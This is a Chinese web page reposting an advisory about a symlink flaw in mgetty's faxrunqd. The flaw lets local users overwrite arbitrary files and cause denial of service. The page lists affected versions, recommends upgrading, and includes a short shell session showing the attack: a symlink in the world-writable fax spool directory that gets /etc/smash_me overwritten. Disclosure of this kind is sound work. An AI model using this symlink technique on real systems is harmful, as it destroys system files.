热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

Linuxfaxrunqd文件创建问题导致拒绝服务攻击

文章标题:Linuxfaxrunqd文件创建问题导致拒绝服务攻击。Linux是中国IT实验室的一个技术频道。包含桌面应用,Linux系统管理,内核研究,嵌入式系统和开源等一些基本分类

  受影响系统:

  mgetty 1.1.21以及更低版本

  - Linux redhat 6.2以及更低版本

  - Linux-Mandrake 7.1 以及更低版本

  - 其他使用有问题mgetty的unix系统

  不受影响系统:

  mgetty 1.1.22

  描述:

  mgetty中带了一个faxrunqd程序,它用来发送faxspool(1)产生的传真队列中的任务。

  在执行时,该程序会在/var/spool/outgoing/目录下创建一个.last_run文件,这个

  目录是任何人可写的。在某些mgetty版本中所带的faxrunqd没有检查该文件是否存在

  或是链接文件,因此攻击者可能覆盖任意系统文件,造成拒绝服务攻击。

  <* 来源: Stan Bubrouski (satan@fastdial.net)*>

  测试方法:

  警 告

  以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

  [user@king /tmp]$ id

  uid=200(user) gid=100(users) groups=100(users)

  [user@king /tmp]$ ls -al /var/spool/fax/outgoing

  total 3

  drwxrwxrwt 3 root root 1024 Jun 2 18:46 .

  drwxr-xr-x 4 root root 1024 Jun 2 18:46 ..

  drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks

  [user@king /tmp]$ ls -al /etc/smash_me

  -rw-r--r-- 1 root root 12 Jun 2 18:45 /etc/smash_me

  [user@king /tmp]$ cat /etc/smash_me

  Smash me!!!

  [user@king /tmp]$ ln -s /etc/smash_me /var/spool/fax/outgoing/.last_run

  [user@king /tmp]$ ls -al /var/spool/fax/outgoing

  total 3

  drwxrwxrwt 3 root root 1024 Jun 2 18:48 .

  drwxr-xr-x 4 root root 1024 Jun 2 18:46 ..

  lrwxrwxrwx 1 user users 13 Jun 2 18:48 .last_run ->

  /etc/smash_me

  drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks

  Root console:

  [root@king /tmp]# faxrunqd -l ttyS0

  ...

  Remote unprivilaged user:

  [user@king /tmp]$ ls -al /var/spool/fax/outgoing

  total 3

  drwxrwxrwt 3 root root 1024 Jun 2 18:48 .

  drwxr-xr-x 4 root root 1024 Jun 2 18:48 ..

  lrwxrwxrwx 1 user users 13 Jun 2 18:48 .last_run ->

  /etc/smash_me

  drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks

  [user@king /tmp]$ ls -al /etc/smash_me

  -rw-r--r-- 1 root root 44 Jun 2 18:48 /etc/smash_me

  [user@king /tmp]$ cat /etc/smash_me

  Fri Jun 2 18:48:47 2000 /usr/sbin/faxrunqd

  建议:

  mgetty 1.1.22已经解决了这个问题,您可以在下列地址下载:

  http://alpha.greenie.net/mgetty/


推荐阅读
  • 在Docker中,将主机目录挂载到容器中作为volume使用时,常常会遇到文件权限问题。这是因为容器内外的UID不同所导致的。本文介绍了解决这个问题的方法,包括使用gosu和suexec工具以及在Dockerfile中配置volume的权限。通过这些方法,可以避免在使用Docker时出现无写权限的情况。 ... [详细]
  • 本文介绍了Python高级网络编程及TCP/IP协议簇的OSI七层模型。首先简单介绍了七层模型的各层及其封装解封装过程。然后讨论了程序开发中涉及到的网络通信内容,主要包括TCP协议、UDP协议和IPV4协议。最后还介绍了socket编程、聊天socket实现、远程执行命令、上传文件、socketserver及其源码分析等相关内容。 ... [详细]
  • 学习SLAM的女生,很酷
    本文介绍了学习SLAM的女生的故事,她们选择SLAM作为研究方向,面临各种学习挑战,但坚持不懈,最终获得成功。文章鼓励未来想走科研道路的女生勇敢追求自己的梦想,同时提到了一位正在英国攻读硕士学位的女生与SLAM结缘的经历。 ... [详细]
  • 本文介绍了数据库的存储结构及其重要性,强调了关系数据库范例中将逻辑存储与物理存储分开的必要性。通过逻辑结构和物理结构的分离,可以实现对物理存储的重新组织和数据库的迁移,而应用程序不会察觉到任何更改。文章还展示了Oracle数据库的逻辑结构和物理结构,并介绍了表空间的概念和作用。 ... [详细]
  • Centos7.6安装Gitlab教程及注意事项
    本文介绍了在Centos7.6系统下安装Gitlab的详细教程,并提供了一些注意事项。教程包括查看系统版本、安装必要的软件包、配置防火墙等步骤。同时,还强调了使用阿里云服务器时的特殊配置需求,以及建议至少4GB的可用RAM来运行GitLab。 ... [详细]
  • 生成对抗式网络GAN及其衍生CGAN、DCGAN、WGAN、LSGAN、BEGAN介绍
    一、GAN原理介绍学习GAN的第一篇论文当然由是IanGoodfellow于2014年发表的GenerativeAdversarialNetworks(论文下载链接arxiv:[h ... [详细]
  • 图解redis的持久化存储机制RDB和AOF的原理和优缺点
    本文通过图解的方式介绍了redis的持久化存储机制RDB和AOF的原理和优缺点。RDB是将redis内存中的数据保存为快照文件,恢复速度较快但不支持拉链式快照。AOF是将操作日志保存到磁盘,实时存储数据但恢复速度较慢。文章详细分析了两种机制的优缺点,帮助读者更好地理解redis的持久化存储策略。 ... [详细]
  • 本文讨论了B360主板是否可以安装win7系统的问题。由于B360主板不支持win7系统且缺乏官方驱动的支持,安装win7系统可能存在兼容性和稳定性问题。然而,通过借助USB3.0转接卡,B360主板仍然可以安装win7系统,但USB接口无法使用。相比之下,B365主板可以直接支持win7系统,并提供了相应的驱动,具有更好的稳定性和兼容性。选择合适的主板对于安装win7系统至关重要。 ... [详细]
  • 这是原文链接:sendingformdata许多情况下,我们使用表单发送数据到服务器。服务器处理数据并返回响应给用户。这看起来很简单,但是 ... [详细]
  • SpringBoot uri统一权限管理的实现方法及步骤详解
    本文详细介绍了SpringBoot中实现uri统一权限管理的方法,包括表结构定义、自动统计URI并自动删除脏数据、程序启动加载等步骤。通过该方法可以提高系统的安全性,实现对系统任意接口的权限拦截验证。 ... [详细]
  • Java序列化对象传给PHP的方法及原理解析
    本文介绍了Java序列化对象传给PHP的方法及原理,包括Java对象传递的方式、序列化的方式、PHP中的序列化用法介绍、Java是否能反序列化PHP的数据、Java序列化的原理以及解决Java序列化中的问题。同时还解释了序列化的概念和作用,以及代码执行序列化所需要的权限。最后指出,序列化会将对象实例的所有字段都进行序列化,使得数据能够被表示为实例的序列化数据,但只有能够解释该格式的代码才能够确定数据的内容。 ... [详细]
  • 本文介绍了新款奇骏的两个让人上瘾的功能,分别是智能互联系统和BOSE音响。通过对新款奇骏的配置和功能进行评测,探讨了这两个新增功能的使用体验和优势。此外,还介绍了新款奇骏的其他配置和改进,如增加的座椅和驾驶辅助系统,以及内饰的舒适性提升。对于喜欢音响的消费者来说,BOSE音响的升级也是一个亮点。最后,文章提到了BOSE音响的数字还原能力,以及7座版无法配备BOSE音响的原因。 ... [详细]
  • 本文介绍了Perl的测试框架Test::Base,它是一个数据驱动的测试框架,可以自动进行单元测试,省去手工编写测试程序的麻烦。与Test::More完全兼容,使用方法简单。以plural函数为例,展示了Test::Base的使用方法。 ... [详细]
  • 推荐系统遇上深度学习(十七)详解推荐系统中的常用评测指标
    原创:石晓文小小挖掘机2018-06-18笔者是一个痴迷于挖掘数据中的价值的学习人,希望在平日的工作学习中,挖掘数据的价值, ... [详细]
  • Oracle分析函数first_value()和last_value()的用法及原理
    本文介绍了Oracle分析函数first_value()和last_value()的用法和原理,以及在查询销售记录日期和部门中的应用。通过示例和解释,详细说明了first_value()和last_value()的功能和不同之处。同时,对于last_value()的结果出现不一样的情况进行了解释,并提供了理解last_value()默认统计范围的方法。该文对于使用Oracle分析函数的开发人员和数据库管理员具有参考价值。 ... [详细]
author-avatar
有海的地方最美_171
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有